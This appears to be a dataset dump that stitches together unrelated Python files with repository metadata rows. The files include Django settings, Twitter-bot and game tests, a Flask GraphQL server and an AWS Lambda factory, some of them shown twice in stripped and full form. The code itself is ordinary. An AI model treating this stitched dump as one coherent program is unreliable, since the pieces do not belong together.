import os django_secret = os.getenv('DJANGO_SECRET_KEY', 'l0cAl-t3st*') django_is_debug_activated = os.getenv('DJANGO_DEBUG', 'False').lower() == 'true' django_relative_path_for_static_file = os.getenv('DJANGO_STATIC_PATH', './public/static') auth0_client_id = os.getenv('AUTH0_CLIENT_ID') auth0_client_secret = os.getenv('AUTH0_CLIENT_SECRET') # POSTGRESQL_ADDON -> env variables in CleverCloud database = { 'name': os.getenv('POSTGRESQL_ADDON_DB', os.getenv('PG_DB', '')), 'user': os.getenv('POSTGRESQL_ADDON_USER', os.getenv('PG_USER', '')), 'password': os.getenv('POSTGRESQL_ADDON_PASSWORD', os.getenv('PG_PWD', '')), 'host': os.getenv('POSTGRESQL_ADDON_HOST', os.getenv('PG_HOST', '')), 'port': os.getenv('POSTGRESQL_ADDON_PORT', os.getenv('PG_PORT', '')), }
46.235294
89
0.717557
import os django_secret = os.getenv('DJANGO_SECRET_KEY', 'l0cAl-t3st*') django_is_debug_activated = os.getenv('DJANGO_DEBUG', 'False').lower() == 'true' django_relative_path_for_static_file = os.getenv('DJANGO_STATIC_PATH', './public/static') auth0_client_id = os.getenv('AUTH0_CLIENT_ID') auth0_client_secret = os.getenv('AUTH0_CLIENT_SECRET') # POSTGRESQL_ADDON -> env variables in CleverCloud database = { 'name': os.getenv('POSTGRESQL_ADDON_DB', os.getenv('PG_DB', '')), 'user': os.getenv('POSTGRESQL_ADDON_USER', os.getenv('PG_USER', '')), 'password': os.getenv('POSTGRESQL_ADDON_PASSWORD', os.getenv('PG_PWD', '')), 'host': os.getenv('POSTGRESQL_ADDON_HOST', os.getenv('PG_HOST', '')), 'port': os.getenv('POSTGRESQL_ADDON_PORT', os.getenv('PG_PORT', '')), }
0
0
0
2c6268758b8e73bd29f7948fb2074d858df22206
10,073
py
Python
cpdb/twitterbot/tests/test_response_builders.py
invinst/CPDBv2_backend
b4e96d620ff7a437500f525f7e911651e4a18ef9
[ "Apache-2.0" ]
25
2018-07-20T22:31:40.000Z
2021-07-15T16:58:41.000Z
cpdb/twitterbot/tests/test_response_builders.py
invinst/CPDBv2_backend
b4e96d620ff7a437500f525f7e911651e4a18ef9
[ "Apache-2.0" ]
13
2018-06-18T23:08:47.000Z
2022-02-10T07:38:25.000Z
cpdb/twitterbot/tests/test_response_builders.py
invinst/CPDBv2_backend
b4e96d620ff7a437500f525f7e911651e4a18ef9
[ "Apache-2.0" ]
6
2018-05-17T21:59:43.000Z
2020-11-17T00:30:26.000Z
from django.test import TestCase from django.test.utils import override_settings from mock.mock import mock_open from robber import expect from mock import patch, Mock from twitterbot.response_builders import ( SingleOfficerResponseBuilder, CoaccusedPairResponseBuilder, BaseResponseBuilder, NotFoundResponseBuilder) from twitterbot.factories import ResponseTemplateFactory from twitterbot.models import ResponseTemplate from data.factories import OfficerFactory, OfficerAllegationFactory, AllegationFactory
37.868421
115
0.586022
from django.test import TestCase from django.test.utils import override_settings from mock.mock import mock_open from robber import expect from mock import patch, Mock from twitterbot.response_builders import ( SingleOfficerResponseBuilder, CoaccusedPairResponseBuilder, BaseResponseBuilder, NotFoundResponseBuilder) from twitterbot.factories import ResponseTemplateFactory from twitterbot.models import ResponseTemplate from data.factories import OfficerFactory, OfficerAllegationFactory, AllegationFactory class BaseResponseBuilderTestCase(TestCase): def setUp(self): ResponseTemplate.objects.all().delete() class DummyResponseBuilder(BaseResponseBuilder): response_type = 'single_officer' def get_variables_sets(self, entities, context): yield dict() self.builder_class = DummyResponseBuilder def test_build_with_round_robined_syntax(self): builder = self.builder_class() ResponseTemplateFactory(id=20, response_type='single_officer', syntax='temp1') ResponseTemplateFactory(id=21, response_type='single_officer', syntax='temp2') expect(list(builder.build(extra_variables={'user_name': 'abc'}))).to.eq([{ 'source': (), 'tweet_content': 'temp1', 'url': '', 'type': 'single_officer', 'entity': None, 'coaccused': 0, 'officer1': None, 'officer2': None }]) expect(list(builder.build(extra_variables={'user_name': 'def'}))).to.eq([{ 'source': (), 'tweet_content': 'temp1', 'url': '', 'type': 'single_officer', 'entity': None, 'coaccused': 0, 'officer1': None, 'officer2': None }]) expect(list(builder.build(extra_variables={'user_name': 'abc'}))).to.eq([{ 'source': (), 'tweet_content': 'temp2', 'url': '', 'type': 'single_officer', 'entity': None, 'coaccused': 0, 'officer1': None, 'officer2': None }]) expect(list(builder.build(extra_variables={'user_name': 'abc'}))).to.eq([{ 'source': (), 'tweet_content': 'temp1', 'url': '', 'type': 'single_officer', 'entity': None, 'coaccused': 0, 'officer1': None, 'officer2': None }]) def test_build_with_syntax_depend_on_right_response_type(self): builder = 
self.builder_class() ResponseTemplateFactory(response_type='single_officer', syntax='b') ResponseTemplateFactory(response_type='test', syntax='c') context = dict() expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=context))).to.eq([{ 'source': (), 'tweet_content': 'b', 'url': '', 'type': 'single_officer', 'entity': None, 'coaccused': 0, 'officer1': None, 'officer2': None }]) expect(context['responses_count']).to.eq(1) def test_build_with_truncating_user_name_if_tweet_content_longer_than_140_characters(self): builder = self.builder_class() ResponseTemplateFactory(response_type='single_officer', syntax='@{{user_name}} anything else') with patch('twitterbot.response_builders.len', return_value=150): first_built = list(builder.build(extra_variables={'user_name': 'abc'}))[0] tweet_content = first_built['tweet_content'] expect(tweet_content).to.eq('anything else') class SingleOfficerResponseBuilderTestCase(TestCase): def setUp(self): ResponseTemplate.objects.all().delete() @override_settings(DOMAIN='http://foo.co') def test_build(self): _mock_open = mock_open() with patch('twitterbot.handlers.open', _mock_open, create=True): officer1 = OfficerFactory(id=1, first_name='Jerome', last_name='Finnigan', allegation_count=3) officer1_doc = { 'id': officer1.id, 'full_name': officer1.full_name } officer2 = OfficerFactory(id=2, first_name='Raymond', last_name='Piwnicki') officer2_doc = { 'id': officer2.id, 'full_name': officer2.full_name } ResponseTemplateFactory( response_type='single_officer', syntax='@{{user_name}} {{officer.full_name}} has {{officer.allegation_count}} complaints') builder = SingleOfficerResponseBuilder() officers = [('source1', officer1_doc), ('source2', officer2_doc)] expect(list(builder.build(officers, {'user_name': 'abc'}))).to.eq([{ 'source': ('source1',), 'tweet_content': '@abc Jerome Finnigan has 3 complaints', 'url': 'http://foo.co/officer/1/', 'type': 'single_officer', 'entity': officer1_doc, 'officer1': None, 'officer2': None, 
'coaccused': 0, }, { 'source': ('source2',), 'tweet_content': '@abc Raymond Piwnicki has 0 complaints', 'url': 'http://foo.co/officer/2/', 'type': 'single_officer', 'entity': officer2_doc, 'officer1': None, 'officer2': None, 'coaccused': 0, }]) class CoaccusedPairResponseBuilderTestCase(TestCase): def setUp(self): ResponseTemplate.objects.all().delete() def test_build(self): officer1 = OfficerFactory(first_name='Jerome', last_name='Finnigan') allegation = AllegationFactory() OfficerAllegationFactory(officer=officer1, allegation=allegation) officer1_doc = { 'id': officer1.id, 'full_name': officer1.full_name, 'complaints': 3 } officer2 = OfficerFactory(first_name='Raymond', last_name='Piwnicki') OfficerAllegationFactory(officer=officer2, allegation=allegation) officer2_doc = { 'id': officer2.id, 'full_name': officer2.full_name, 'complaints': 3 } officer3 = OfficerFactory(first_name='Jesse', last_name='Acosta') OfficerAllegationFactory(officer=officer3) officer3_doc = { 'id': officer3.id, 'full_name': officer3.full_name, 'complaints': 3 } ResponseTemplateFactory( response_type='coaccused_pair', syntax=( '@{{user_name}} {{officer1.full_name}} and {{officer2.full_name}} ' 'were co-accused in {{coaccused}} case' ) ) builder = CoaccusedPairResponseBuilder() expect(list(builder.build( [('source1', officer1_doc), ('source2', officer2_doc), ('source3', officer3_doc)], {'user_name': 'abc'})) ).to.eq([{ 'source': ('source1', 'source2'), 'tweet_content': '@abc Jerome Finnigan and Raymond Piwnicki were co-accused in 1 case', 'url': '', 'type': 'coaccused_pair', 'entity': None, 'officer1': officer1, 'officer2': officer2, 'coaccused': 1, }]) class NotFoundResponseBuilderTestCase(TestCase): def setUp(self): ResponseTemplate.objects.all().delete() ResponseTemplateFactory( response_type='not_found', syntax='Sorry, @{{user_name}}, the bot find nothing') def test_build_with_0_response(self): builder = NotFoundResponseBuilder() tweet = Mock( is_tweet_from_followed_accounts=False, 
is_retweet_of_twitterbot=False, is_quoted_tweet_of_twitterbot=False) context = { 'response_count': 0, 'incoming_tweet': tweet } with self.settings(DOMAIN='http://foo.co'): expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=context))).to.eq([{ 'source': (), 'tweet_content': 'Sorry, @abc, the bot find nothing', 'url': 'http://foo.co', 'type': 'not_found', 'entity': None, 'officer1': None, 'officer2': None, 'coaccused': 0 }]) def test_build_with_response(self): builder = NotFoundResponseBuilder() expect(list(builder.build(extra_variables={'user_name': 'abc'}, context={'responses_count': 1}))).to.eq([]) def test_do_nothing_if_retweet_of_twitterbot(self): builder = NotFoundResponseBuilder() tweet = Mock( is_tweet_from_followed_accounts=False, is_retweet_of_twitterbot=True, is_quoted_tweet_of_twitterbot=False) context = { 'responses_count': 0, 'incoming_tweet': tweet } expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=context))).to.eq([]) def test_do_nothing_if_quoted_tweet_of_twitterbot(self): builder = NotFoundResponseBuilder() tweet = Mock( is_tweet_from_followed_accounts=False, is_retweet_of_twitterbot=False, is_quoted_tweet_of_twitterbot=True) context = { 'responses_count': 0, 'incoming_tweet': tweet } expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=context))).to.eq([]) def test_do_nothing_if_there_is_no_incoming_tweet(self): builder = NotFoundResponseBuilder() context = { 'responses_count': 0, 'incoming_tweet': None } expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=context))).to.eq([]) def test_do_nothing_if_there_is_no_context(self): builder = NotFoundResponseBuilder() expect(list(builder.build(extra_variables={'user_name': 'abc'}, context=None))).to.eq([])
8,901
214
440
7f8b17757fa5f2876737685c8360f39e1e1cef47
1,357
py
Python
soundrts/tests/test_world.py
fcnjd/soundrts
3492503d0f4712a31c662d57434ddf8a852d0816
[ "BSD-3-Clause" ]
2
2019-12-29T16:18:10.000Z
2019-12-29T16:18:39.000Z
soundrts/tests/test_world.py
fcnjd/soundrts
3492503d0f4712a31c662d57434ddf8a852d0816
[ "BSD-3-Clause" ]
1
2018-02-17T10:41:18.000Z
2018-02-17T10:41:18.000Z
soundrts/tests/test_world.py
fcnjd/soundrts
3492503d0f4712a31c662d57434ddf8a852d0816
[ "BSD-3-Clause" ]
null
null
null
import unittest from soundrts.world import World from soundrts.mapfile import Map # print self.w.get_objects_string()[-160:] if __name__ == "__main__": unittest.main()
32.309524
82
0.608696
import unittest from soundrts.world import World from soundrts.mapfile import Map class WorldTestCase(unittest.TestCase): def setUp(self): self.w = World([]) self.w.load_and_build_map(Map("multi/m2.txt")) self.w2 = World([]) self.w2.load_and_build_map(Map("multi/jl2.txt")) def tearDown(self): pass def testShortestPath(self): g = self.w.grid self.assertEqual(g["a1"].shortest_path_distance_to(g["a2"]), g["a1"].shortest_path_distance_to(g["b1"])) self.assertIn( g["a1"].shortest_path_to(g["e5"]).other_side.place.name, ("a2", "b1")) self.assertEqual( g["b1"].shortest_path_to(g["e5"]).other_side.place.name, "b2") self.assertEqual( g["b1"].shortest_path_to(g["d2"]).other_side.place.name, "c1") g2 = self.w2.grid self.assertEqual(g2["a1"].shortest_path_to(g2["c1"]), None) self.assertEqual(g2["c1"].shortest_path_to(g2["a1"]), None) def testCheckString(self): World([]).get_digest() self.assertEqual(self.w.get_digest(), self.w.get_digest()) self.assertNotEqual(self.w.get_digest(), self.w2.get_digest()) self.w.get_objects_string() # print self.w.get_objects_string()[-160:] if __name__ == "__main__": unittest.main()
1,021
18
135
178c0c20dcc9abe86434ad86ea0996c5a40260ae
58
py
Python
frontend/gunicorn.confi.py
laughinging/yaes
0893f7848ee0530fa6c3bd553f89aa430f9b2f02
[ "MIT" ]
null
null
null
frontend/gunicorn.confi.py
laughinging/yaes
0893f7848ee0530fa6c3bd553f89aa430f9b2f02
[ "MIT" ]
null
null
null
frontend/gunicorn.confi.py
laughinging/yaes
0893f7848ee0530fa6c3bd553f89aa430f9b2f02
[ "MIT" ]
null
null
null
workers = 2 worker_class = 'gevent' bind = "0.0.0.0:8888"
14.5
23
0.655172
workers = 2 worker_class = 'gevent' bind = "0.0.0.0:8888"
0
0
0
e8e0a0444c4be29eeeb8e912e2a2e9fbfd16637f
5,641
py
Python
src/OTLMOW/OTLModel/Classes/Overstortrand.py
davidvlaminck/OTLClassPython
71330afeb37c3ea6d9981f521ff8f4a3f8b946fc
[ "MIT" ]
2
2022-02-01T08:58:11.000Z
2022-02-08T13:35:17.000Z
src/OTLMOW/OTLModel/Classes/Overstortrand.py
davidvlaminck/OTLMOW
71330afeb37c3ea6d9981f521ff8f4a3f8b946fc
[ "MIT" ]
null
null
null
src/OTLMOW/OTLModel/Classes/Overstortrand.py
davidvlaminck/OTLMOW
71330afeb37c3ea6d9981f521ff8f4a3f8b946fc
[ "MIT" ]
null
null
null
# coding=utf-8 from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut from OTLMOW.OTLModel.Classes.AIMObject import AIMObject from OTLMOW.OTLModel.Datatypes.DtcDocument import DtcDocument from OTLMOW.OTLModel.Datatypes.KlOverstortrandMateriaal import KlOverstortrandMateriaal from OTLMOW.OTLModel.Datatypes.KlVariabelDeelType import KlVariabelDeelType from OTLMOW.OTLModel.Datatypes.KwantWrdInMillimeter import KwantWrdInMillimeter from OTLMOW.GeometrieArtefact.VlakGeometrie import VlakGeometrie # Generated with OTLClassCreator. To modify: extend, do not edit class Overstortrand(AIMObject, VlakGeometrie): """Een overstortrand heeft als doel het afvoeren van (pieken in) overtollig rioolwater vanuit de gemengde riolering naar het oppervlaktewater.""" typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand' """De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI.""" @property def breedte(self): """De afstand tussen de uiterste zijden van de overstortrand in millimeter.""" return self._breedte.get_waarde() @breedte.setter @property def hoogte(self): """De afstand tussen de vaste drempel en het hoogste punt van de overstortrand in millimeter.""" return self._hoogte.get_waarde() @hoogte.setter @property def materiaal(self): """Het materiaal waaruit de overstortrand vervaardigd is.""" return self._materiaal.get_waarde() @materiaal.setter @property def technischeFiche(self): """De technische fiche van de de overstortrand.""" return self._technischeFiche.get_waarde() @technischeFiche.setter @property def variabelDeelType(self): """Bepaalt het type van het variabel deel van de overstortrand.""" return self._variabelDeelType.get_waarde() @variabelDeelType.setter @property def wanddikte(self): """De wanddikte van de overstortrand in millimeter.""" return self._wanddikte.get_waarde() @wanddikte.setter
48.213675
149
0.593157
# coding=utf-8 from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut from OTLMOW.OTLModel.Classes.AIMObject import AIMObject from OTLMOW.OTLModel.Datatypes.DtcDocument import DtcDocument from OTLMOW.OTLModel.Datatypes.KlOverstortrandMateriaal import KlOverstortrandMateriaal from OTLMOW.OTLModel.Datatypes.KlVariabelDeelType import KlVariabelDeelType from OTLMOW.OTLModel.Datatypes.KwantWrdInMillimeter import KwantWrdInMillimeter from OTLMOW.GeometrieArtefact.VlakGeometrie import VlakGeometrie # Generated with OTLClassCreator. To modify: extend, do not edit class Overstortrand(AIMObject, VlakGeometrie): """Een overstortrand heeft als doel het afvoeren van (pieken in) overtollig rioolwater vanuit de gemengde riolering naar het oppervlaktewater.""" typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand' """De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI.""" def __init__(self): AIMObject.__init__(self) VlakGeometrie.__init__(self) self._breedte = OTLAttribuut(field=KwantWrdInMillimeter, naam='breedte', label='breedte', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.breedte', definition='De afstand tussen de uiterste zijden van de overstortrand in millimeter.', owner=self) self._hoogte = OTLAttribuut(field=KwantWrdInMillimeter, naam='hoogte', label='hoogte', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.hoogte', definition='De afstand tussen de vaste drempel en het hoogste punt van de overstortrand in millimeter.', owner=self) self._materiaal = OTLAttribuut(field=KlOverstortrandMateriaal, naam='materiaal', label='materiaal', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.materiaal', definition='Het materiaal waaruit de overstortrand vervaardigd is.', owner=self) self._technischeFiche = OTLAttribuut(field=DtcDocument, naam='technischeFiche', label='technische fiche', 
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.technischeFiche', definition='De technische fiche van de de overstortrand.', owner=self) self._variabelDeelType = OTLAttribuut(field=KlVariabelDeelType, naam='variabelDeelType', label='variabel deel type', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.variabelDeelType', definition='Bepaalt het type van het variabel deel van de overstortrand.', owner=self) self._wanddikte = OTLAttribuut(field=KwantWrdInMillimeter, naam='wanddikte', label='wanddikte', objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#Overstortrand.wanddikte', definition='De wanddikte van de overstortrand in millimeter.', owner=self) @property def breedte(self): """De afstand tussen de uiterste zijden van de overstortrand in millimeter.""" return self._breedte.get_waarde() @breedte.setter def breedte(self, value): self._breedte.set_waarde(value, owner=self) @property def hoogte(self): """De afstand tussen de vaste drempel en het hoogste punt van de overstortrand in millimeter.""" return self._hoogte.get_waarde() @hoogte.setter def hoogte(self, value): self._hoogte.set_waarde(value, owner=self) @property def materiaal(self): """Het materiaal waaruit de overstortrand vervaardigd is.""" return self._materiaal.get_waarde() @materiaal.setter def materiaal(self, value): self._materiaal.set_waarde(value, owner=self) @property def technischeFiche(self): """De technische fiche van de de overstortrand.""" return self._technischeFiche.get_waarde() @technischeFiche.setter def technischeFiche(self, value): self._technischeFiche.set_waarde(value, owner=self) @property def variabelDeelType(self): """Bepaalt het type van het variabel deel van de overstortrand.""" return self._variabelDeelType.get_waarde() @variabelDeelType.setter def variabelDeelType(self, value): self._variabelDeelType.set_waarde(value, owner=self) @property def wanddikte(self): """De wanddikte van de overstortrand in 
millimeter.""" return self._wanddikte.get_waarde() @wanddikte.setter def wanddikte(self, value): self._wanddikte.set_waarde(value, owner=self)
3,394
0
183
76fcb2603b88ccac0913fe789652456f73c7fa0b
209
py
Python
synth.py
codyoss/sloth
a3e67e5dd5f776db8b5df33b593f1a20707e9511
[ "Apache-2.0" ]
2
2019-02-19T08:42:32.000Z
2019-02-19T08:42:41.000Z
synth.py
codyoss/sloth
a3e67e5dd5f776db8b5df33b593f1a20707e9511
[ "Apache-2.0" ]
534
2019-11-15T02:30:56.000Z
2021-11-25T16:00:20.000Z
synth.py
codyoss/sloth
a3e67e5dd5f776db8b5df33b593f1a20707e9511
[ "Apache-2.0" ]
1
2019-01-14T16:18:36.000Z
2019-01-14T16:18:36.000Z
import synthtool as s import synthtool.gcp as gcp import logging logging.basicConfig(level=logging.DEBUG) common_templates = gcp.CommonTemplates() templates = common_templates.node_library() s.copy(templates)
26.125
43
0.832536
import synthtool as s import synthtool.gcp as gcp import logging logging.basicConfig(level=logging.DEBUG) common_templates = gcp.CommonTemplates() templates = common_templates.node_library() s.copy(templates)
0
0
0
5acb38c9155130c3e42b9f2df9274104a0876546
275
py
Python
server.py
LordGhostX/graphql-profanity-filter
71465693cb961066dc7a05bfc78260471cde82bc
[ "MIT" ]
2
2021-07-19T21:32:00.000Z
2021-07-28T20:47:44.000Z
server.py
LordGhostX/graphql-profanity-filter
71465693cb961066dc7a05bfc78260471cde82bc
[ "MIT" ]
null
null
null
server.py
LordGhostX/graphql-profanity-filter
71465693cb961066dc7a05bfc78260471cde82bc
[ "MIT" ]
null
null
null
from flask import Flask from flask_graphql import GraphQLView from schema import schema app = Flask(__name__) app.add_url_rule("/", view_func=GraphQLView.as_view("graphql", schema=schema, graphiql=True)) if __name__ == "__main__": app.run(debug=True)
22.916667
62
0.72
from flask import Flask from flask_graphql import GraphQLView from schema import schema app = Flask(__name__) app.add_url_rule("/", view_func=GraphQLView.as_view("graphql", schema=schema, graphiql=True)) if __name__ == "__main__": app.run(debug=True)
0
0
0
ac8b81faa9ffcb252fdc732dd62f427ed94c8fa0
10,156
py
Python
core/aws_ddk_core/resources/_lambda.py
vemel/aws-ddk
d34bd1d98f5a170026a1b65f9629e909ca839930
[ "Apache-2.0" ]
37
2022-02-21T19:06:35.000Z
2022-03-31T17:12:26.000Z
core/aws_ddk_core/resources/_lambda.py
vemel/aws-ddk
d34bd1d98f5a170026a1b65f9629e909ca839930
[ "Apache-2.0" ]
25
2022-02-22T15:13:31.000Z
2022-03-29T20:22:43.000Z
core/aws_ddk_core/resources/_lambda.py
vemel/aws-ddk
d34bd1d98f5a170026a1b65f9629e909ca839930
[ "Apache-2.0" ]
6
2022-02-21T19:07:01.000Z
2022-03-08T05:20:59.000Z
# Copyright 2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from typing import Any, Dict, List, Optional import aws_cdk as cdk import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_lambda as lmb from aws_cdk.aws_iam import IRole, PolicyStatement from aws_cdk.aws_sqs import IQueue from aws_ddk_core.config import Config from aws_ddk_core.resources.commons import BaseSchema, Duration, SubnetType from constructs import Construct from marshmallow import ValidationError, fields _logger: logging.Logger = logging.getLogger(__name__) class FunctionSchema(BaseSchema): """DDK Lambda function Marshmallow schema.""" # Lambda function CDK construct fields dead_letter_queue_enabled = fields.Bool() memory_size = fields.Int(load_default=256) environment = fields.Dict(keys=fields.Str, values=fields.Str) profiling = fields.Bool() reserved_concurrent_executions = fields.Int() timeout = Duration(load_default=cdk.Duration.seconds(120)) tracing = fields.Method(deserialize="load_tracing") max_event_age = Duration() retry_attempts = fields.Int() allow_all_outbound = fields.Bool() allow_public_subnet = fields.Bool() # Config specific fields vpc_id = fields.Str(metadata={"config_only": True}) vpc_subnet_type = SubnetType(metadata={"config_only": True}) vpc_subnet_group_name = fields.Str(metadata={"config_only": True}) vpc_subnet_ids = fields.List(fields.Str(), metadata={"config_only": True}) security_group_ids = 
fields.List(fields.Str(), metadata={"config_only": True}) class LambdaFactory: """ Class factory to create and configure Lambda DDK resources, including Functions. """ @staticmethod def function( scope: Construct, id: str, environment_id: str, code: lmb.Code, handler: str, runtime: lmb.Runtime = lmb.Runtime.PYTHON_3_9, function_name: Optional[str] = None, description: Optional[str] = None, role: Optional[IRole] = None, dead_letter_queue_enabled: Optional[bool] = None, dead_letter_queue: Optional[IQueue] = None, memory_size: Optional[int] = None, timeout: Optional[cdk.Duration] = None, **function_props: Any, ) -> lmb.IFunction: """ Create and configure Lambda function. This construct allows to configure parameters of the function using ddk.json configuration file depending on the `environment_id` in which the function is used. Supported parameters are: `dead_letter_queue_enabled`,`memory_size`, `environment`, `profiling`, `reserved_concurrent_executions`, `timeout`, `tracing`, `max_event_age`, `retry_attempts`, `allow_all_outbound`, and `allow_public_subnet`. The parameters are respected in the following order: 1 - Explicit arguments are always preferred 2 - Values from configuration file 3 - Defaults are used otherwise Parameters ---------- scope : Construct Scope within which this construct is defined id : str Identifier of the Lambda function environment_id : str Identifier of the environment code : Code The source code of the Lambda function handler : str The name of the method within the code that Lambda calls to execute the function runtime : Runtime The runtime environment for the Lambda function function_name : Optional[str] The name of the Lambda function description : Optional[str] The description of the Lambda function role : Optional[IRole] Lambda execution role dead_letter_queue_enabled : Optional[bool] Determines if DLQ is enabled. `False` by default. 
dead_letter_queue : Optional[IQueue] The SQS queue to use if DLQ is enabled memory_size : Optional[int] The amount of memory, in MB, that is allocated to the Lambda function. `256` by default. timeout : Optional[Duration] The function execution time (in seconds) after which Lambda terminates the function. `aws_cdk.Duration.seconds(120)` by default. function_props : Any Additional function properties. For complete list of properties refer to CDK Documentation - Lambda Function: https://docs.aws.amazon.com/cdk/api/v2/python/aws_cdk.aws_lambda/Function.html Returns ------- fn : aws_cdk.aws_lambda.Function Lambda function """ # Load function configuration from ddk.json based on environment id and resource id function_config_dict: Dict[str, Any] = Config().get_resource_config( environment_id=environment_id, id=id, ) declared_fields = FunctionSchema().declared_fields.items() # Load CDK-only fields from schema function_construct_props: Dict[str, Any] = FunctionSchema( only=[name for name, field in declared_fields if not field.metadata] ).load(function_config_dict, partial=["removal_policy"]) # Load config-only fields from schema function_config_only_props: Dict[str, Any] = FunctionSchema( only=[name for name, field in declared_fields if field.metadata == {"config_only": True}] ).load(function_config_dict, partial=["removal_policy"]) # Set up networking function_construct_props["vpc"] = LambdaFactory._get_vpc( scope, id, vpc_id=function_config_only_props.get("vpc_id") ) function_construct_props["vpc_subnets"] = LambdaFactory._get_vpc_subnets( scope, id, vpc_subnet_ids=function_config_only_props.get("vpc_subnet_ids"), vpc_subnet_type=function_config_only_props.get("vpc_subnet_type"), vpc_subnet_group_name=function_config_only_props.get("vpc_subnet_group_name"), ) function_construct_props["security_groups"] = LambdaFactory._get_security_groups( scope, id, security_group_ids=function_config_only_props.get("security_group_ids") ) # Collect all explicit function arguments 
function_props = { "code": code, "handler": handler, "runtime": runtime, "role": role, "function_name": function_name, "description": description, "dead_letter_queue_enabled": dead_letter_queue_enabled, "dead_letter_queue": dead_letter_queue, "memory_size": memory_size, "timeout": timeout, **function_props, } # Explicit ("hardcoded") props should always take precedence over config for key, value in function_props.items(): if value is not None: function_construct_props[key] = value _logger.debug(f"function_construct_props: {function_construct_props}") # Create the function fn: lmb.IFunction = lmb.Function(scope, id, **function_construct_props) # Add IAM permissions if "vpc" in function_construct_props: LambdaFactory.add_vpc_permissions(fn) return fn @staticmethod @staticmethod @staticmethod @staticmethod
40.951613
114
0.652422
# Copyright 2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from typing import Any, Dict, List, Optional import aws_cdk as cdk import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_lambda as lmb from aws_cdk.aws_iam import IRole, PolicyStatement from aws_cdk.aws_sqs import IQueue from aws_ddk_core.config import Config from aws_ddk_core.resources.commons import BaseSchema, Duration, SubnetType from constructs import Construct from marshmallow import ValidationError, fields _logger: logging.Logger = logging.getLogger(__name__) class FunctionSchema(BaseSchema): """DDK Lambda function Marshmallow schema.""" # Lambda function CDK construct fields dead_letter_queue_enabled = fields.Bool() memory_size = fields.Int(load_default=256) environment = fields.Dict(keys=fields.Str, values=fields.Str) profiling = fields.Bool() reserved_concurrent_executions = fields.Int() timeout = Duration(load_default=cdk.Duration.seconds(120)) tracing = fields.Method(deserialize="load_tracing") max_event_age = Duration() retry_attempts = fields.Int() allow_all_outbound = fields.Bool() allow_public_subnet = fields.Bool() def load_tracing(self, value: str) -> lmb.Tracing: tracings: Dict[str, lmb.Tracing] = lmb.Tracing._member_map_ try: return tracings[value.upper()] except KeyError as error: raise ValidationError(f"`tracing` value must be one of {tracings.values()}.") from error # Config specific fields vpc_id = 
fields.Str(metadata={"config_only": True}) vpc_subnet_type = SubnetType(metadata={"config_only": True}) vpc_subnet_group_name = fields.Str(metadata={"config_only": True}) vpc_subnet_ids = fields.List(fields.Str(), metadata={"config_only": True}) security_group_ids = fields.List(fields.Str(), metadata={"config_only": True}) class LambdaFactory: """ Class factory to create and configure Lambda DDK resources, including Functions. """ @staticmethod def function( scope: Construct, id: str, environment_id: str, code: lmb.Code, handler: str, runtime: lmb.Runtime = lmb.Runtime.PYTHON_3_9, function_name: Optional[str] = None, description: Optional[str] = None, role: Optional[IRole] = None, dead_letter_queue_enabled: Optional[bool] = None, dead_letter_queue: Optional[IQueue] = None, memory_size: Optional[int] = None, timeout: Optional[cdk.Duration] = None, **function_props: Any, ) -> lmb.IFunction: """ Create and configure Lambda function. This construct allows to configure parameters of the function using ddk.json configuration file depending on the `environment_id` in which the function is used. Supported parameters are: `dead_letter_queue_enabled`,`memory_size`, `environment`, `profiling`, `reserved_concurrent_executions`, `timeout`, `tracing`, `max_event_age`, `retry_attempts`, `allow_all_outbound`, and `allow_public_subnet`. 
The parameters are respected in the following order: 1 - Explicit arguments are always preferred 2 - Values from configuration file 3 - Defaults are used otherwise Parameters ---------- scope : Construct Scope within which this construct is defined id : str Identifier of the Lambda function environment_id : str Identifier of the environment code : Code The source code of the Lambda function handler : str The name of the method within the code that Lambda calls to execute the function runtime : Runtime The runtime environment for the Lambda function function_name : Optional[str] The name of the Lambda function description : Optional[str] The description of the Lambda function role : Optional[IRole] Lambda execution role dead_letter_queue_enabled : Optional[bool] Determines if DLQ is enabled. `False` by default. dead_letter_queue : Optional[IQueue] The SQS queue to use if DLQ is enabled memory_size : Optional[int] The amount of memory, in MB, that is allocated to the Lambda function. `256` by default. timeout : Optional[Duration] The function execution time (in seconds) after which Lambda terminates the function. `aws_cdk.Duration.seconds(120)` by default. function_props : Any Additional function properties. 
